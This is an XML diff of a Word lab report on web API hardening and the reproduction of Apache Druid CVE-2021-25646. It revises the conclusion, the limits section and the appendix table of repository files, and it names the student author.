+        </w:rPr>
+        <w:t xml:space="preserve">Regression: /status reports 0.20.1 and the console answers 302 (screenshot 07)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t xml:space="preserve">12. Conclusion</w:t>
       </w:r>
     </w:p>
@@ -4397,7 +5488,7 @@
       </w:pPr>
       <w:r>
         <w:rPr/>
-        <w:t xml:space="preserve">The defensive half of the work shows that the three most common failure modes have well-understood, cheap remedies: parameterised queries remove SQL injection as a class rather than filtering payloads, output encoding removes XSS at the point where the context is known, and bcrypt plus a correctly verified JWT removes the weakest links in authentication. The pipeline turns those properties into something that is checked on every commit instead of promised in a document.</w:t>
+        <w:t xml:space="preserve">The defensive half of the work shows that the three most common failure modes have well-understood, cheap remedies: parameterised queries remove SQL injection as a class rather than filtering payloads, output encoding removes XSS at the point where the context is known, and bcrypt plus a correctly verified JWT removes the weakest links in authentication. The pipeline turns those properties into something that is checked on every commit instead of promised in a document: the last run audited 9 pinned dependencies, found no issue in 286 lines of scanned source, passed 12 tests and answered the four live requests of the smoke test in the expected way - and states that verdict in one sentence on the run page.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4405,7 +5496,17 @@
         <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>The offensive half shows something different: the Druid defect is not exotic. It is an unvalidated key in a deserialised configuration map, and it survived into a widely deployed product because the feature was believed to be safely disabled. Reproducing it in a container, reading the patch, and then proving that the same request fails afterwards is the loop that connects a CVE identifier on a website to an actual, verifiable fact about a system.</w:t>
+        <w:rPr/>
+        <w:t xml:space="preserve">The offensive half shows something different: the Druid defect is not exotic. It is one unvalidated map key on a feature that was already switched off, and it survived into a widely deployed product because the guard was a setting rather than a boundary. Reproducing it in a container, reading the patch and proving that the same request is refused afterwards is the loop that turns a CVE identifier on a website into a verifiable fact about a system - and it is the same loop a penetration tester or a SOC analyst runs whenever a new advisory lands.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The limit of what was demonstrated is worth stating. The API is protected against the three classes the assignment names, not against every class in the OWASP Top 10: there is no rate limiting, no account lockout and no revocation list, and the JWT is stateless by design, so a stolen token stays valid for up to thirty minutes. The CVE half proves that a patched version refuses the specific request that worked; it does not prove the absence of other ways to reach the JavaScript parser. Both are the correct scope for a laboratory exercise, and both are the first things to extend in a real deployment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4509,7 +5610,11 @@
               <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>https://github.com/kanloner/information_security</w:t>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">https://github.com/kanloner/information_security</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4543,7 +5648,11 @@
               <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>https://github.com/kanloner/information_security/actions/runs/39367332876</w:t>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">https://github.com/kanloner/information_security/actions/runs/39544635930</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4581,7 +5690,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">app.py</w:t>
+              <w:t xml:space="preserve">app.py, init_db.py, create_user.py</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4615,7 +5724,11 @@
               <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>.github/workflows/ci.yml</w:t>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">.github/workflows/ci.yml</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4653,7 +5766,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">tests/test_api.py</w:t>
+              <w:t xml:space="preserve">tests/test_api.py (12 tests)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4691,7 +5804,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>cve/CVE-2021-25646/docker-compose.yml</w:t>
+              <w:t xml:space="preserve">cve/CVE-2021-25646/docker-compose.yml</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4729,7 +5842,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>cve/CVE-2021-25646/reproduce.sh</w:t>
+              <w:t xml:space="preserve">cve/CVE-2021-25646/reproduce.sh</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4767,7 +5880,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t>cve/CVE-2021-25646/verify_fix.sh</w:t>
+              <w:t xml:space="preserve">cve/CVE-2021-25646/verify_fix.sh</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4801,7 +5914,11 @@
               <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t>fixes/ (docker-compose.yml + Dockerfile)</w:t>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">fixes/Dockerfile + fixes/docker-compose.yml</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4839,7 +5956,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">docs/screenshots/</w:t>
+              <w:t xml:space="preserve">docs/screenshots/ (10 files)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4862,7 +5979,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">Note: the variant number is filled in on the cover page, and the repository and pipeline links in this appendix are completed if the work is submitted through a public git repository.</w:t>
+        <w:t xml:space="preserve">Variant: CVE-2021-25646. Student: Zhaohan Liao, HDU number 23320330.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

</xml_diff>